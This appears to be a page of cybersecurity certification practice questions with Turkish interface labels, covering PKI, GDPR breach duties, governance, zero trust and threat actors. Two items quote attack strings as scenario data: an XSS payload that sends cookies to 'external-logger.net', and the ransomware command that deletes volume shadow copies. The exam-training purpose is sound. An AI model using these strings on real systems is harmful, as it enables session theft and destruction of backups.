Tüm alıştırma soruları
2232 soru
A network administrator is establishing PKI certificate management processes and automated revocation checks for a cluster of internal web applications. To ensure optimal security during certificate issuance and minimize handshake latency during revocation checking, which of the following implementation steps should the administrator select? (Select TWO).
Geçerli olan tümünü seçin
A university based in the United States operates an online portal for international exchange programs, collecting personal identification details and financial records from European Union residents. Following a confirmed security incident involving unauthorized access to the application database, the compliance officer is determining legal breach notification duties. Which of the following obligations MUST the institution fulfill to satisfy regulatory compliance mandates? (Select TWO.)
Geçerli olan tümünü seçin
A security administrator inspecting Network Intrusion Detection System (NIDS) alerts detects an HTTP POST request targeting an internal human resources portal. The recorded packet payload contains the string: `user=jdoe&token=<script>document.location='http://external-logger.net/collect?c='+document.cookie</script>`. Which of the following correctly identifies the vector shown in the alert and the proper security control response?
An information security officer at a biotechnology research institute is restructuring the organization's governance framework to align with updated compliance requirements. The officer must distinguish mandatory governance mandates from non-binding operational advice across the enterprise. Which of the following document types represent mandatory governance requirements that employees and systems must strictly follow? (Select TWO.)
Geçerli olan tümünü seçin
A regional logistics company based in the United States is expanding fleet management operations into the European Union. The engineering team plans to deploy AI-driven in-cab cameras that continuously scan driver facial features to detect signs of fatigue and alert dispatchers. Because facial scanning involves processing special category biometric data to uniquely identify individuals, the security governance team must ensure compliance with EU data privacy regulations. Which of the following actions is mandatory prior to initiating this high-risk data processing activity?
A multinational logistics firm is standardizing its wireless network infrastructure across regional distribution hubs. IT leadership issues a mandatory document detailing exact technical requirements—such as requiring WPA3-Enterprise encryption for all wireless access points—that all regional engineering teams must strictly enforce without deviation. Which of the following governance document types describes this document?
During an internal compliance audit of an online education organization, a security manager discovers that the database administration (DBA) team currently defines data sensitivity levels, determines retention schedules, and approves external data-sharing requests for student records. The DBAs also manage database backups, patch management, and access control list (ACL) configurations. Which of the following recommendations should the security manager make to properly align data governance responsibilities?
An international e-commerce organization headquartered in the United States discovers an unauthorized database export containing names, email addresses, and behavioral tracking logs of customers residing in the European Union. Which regulatory framework explicitly mandates that the data controller notify the competent supervisory authority without undue delay and, where feasible, no later than 72 hours after becoming aware of the personal data breach?
An organization is defining service continuity metrics for its cloud-hosted human resources application during a Business Impact Analysis (BIA). Executive management mandates that in the event of a storage array failure, the system must be fully restored and operational within 6 hours, and data loss must not exceed 30 minutes of transactions. Which metric directly defines the 30-minute data loss threshold?
Match each core Zero Trust Architecture (ZTA) control plane component with its primary operational responsibility in accordance with NIST SP 800-207 standards.
Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın
Öğeler
Eşleşmeler
A security operations team wants to identify unauthorized credential harvesting and post-exploitation lateral movement within a hybrid cloud enterprise network. To achieve this without altering production network routing or risking asset compromise, the team injects synthetic cloud API keys and decoy Kerberos ticket-granting service (TGS) requests into the LSASS memory space of critical endpoints. When an attacker attempts to extract these fake credentials and present them to a decoy authentication service, an alert is triggered immediately. Which of the following deception and disruption technologies did the organization deploy?
An enterprise deploys several virtual machines in a cloud environment. The organization's internal IT team is responsible for installing operating system security patches, configuring guest firewalls, and managing application software, while the cloud provider manages the underlying physical hardware and hypervisor infrastructure. Which cloud service model is being used?
A security analyst is tasked with assessing a newly deployed web application hosted in a staging environment. The analyst needs to identify runtime vulnerabilities, such as parameter tampering and input validation flaws, operating from a black-box perspective without access to the underlying source code. Which of the following security testing methods is most appropriate for this assessment?
An enterprise system Administrator discovers that a malicious script unexpectedly executed on a server immediately after a terminated employee's user account was disabled. The script was configured to monitor user directory changes and wipe database backups once the account status changed. Which type of malware or malicious code relies on a predefined trigger condition or specific event to execute its payload?
A security operations team investigating an incident at a global maritime logistics enterprise discovers that an unauthorized external entity compromised an edge API endpoint used by a third-party tracking partner. The threat actor utilized legitimate, stolen developer API tokens to gain access. Over an eight-month period, the actor made subtle, highly targeted modifications to cargo manifest metadata to delay specific dual-use technology shipments across international borders. The actor avoided deploying malware, exfiltrating bulk data, or disrupting general operations to evade detection by automated security controls. Based on these observed tactics, techniques, and procedures (TTPs), which threat actor profile and attribute combination is MOST likely responsible for this attack?
An enterprise financial institution plans to automate the ingestion of machine-readable threat indicators specifically sourced from peer sector organizations while standardizing automated indicator transport into its Security Orchestration, Automation, and Response (SOAR) platform. Which of the following solutions should the cybersecurity team implement to achieve these specific objectives? (Select TWO.)
Geçerli olan tümünü seçin
A security operations team at an autonomous vehicle software vendor detects a long-term breach of their internal development environment. The investigation reveals that the adversary exploited an undisclosed zero-day vulnerability in a perimeter gateway, used custom memory-resident tools to avoid endpoint detection, and maintained persistence for over six months strictly to exfiltrate proprietary machine learning models without disrupting operations or making extortion demands. Which threat actor profile best aligns with the attributes and tactics observed in this scenario?
A security monitoring tool flags multiple enterprise endpoints executing command-line instructions to disable the Volume Shadow Copy Service (`vssadmin delete shadows /all /quiet`) while concurrently generating high-volume disk write events that append custom file extensions to local documents. Which of the following malware types is most likely responsible for this activity?
A lead security auditor is reviewing a security assessment proposal for a facility that manages sensitive operational technology (OT) and legacy SCADA devices. The assessment team initially proposes running high-intensity active vulnerability scans across all subnets to discover open ports, running services, and unpatched vulnerabilities. The lead auditor rejects this proposal due to the high risk of intrusive active probing crashing sensitive legacy controllers. Which security assessment method should the lead auditor recommend as the safest alternative to identify active hosts and services on the OT network without disrupting operational systems?
A financial institution's security team is investigating an incident where confidential transaction payloads transmitted over an encrypted TLS connection were intercepted and decrypted by an adversary positioned on the network path. Technical analysis reveals that the server accepted legacy TLS 1.2 connections configured with AES in Cipher Block Chaining (CBC) mode using predictable initialization vectors (IVs) and HMAC-SHA1. Which cryptographic weakness directly enabled the adversary to decrypt the payload without possessing the server's private key?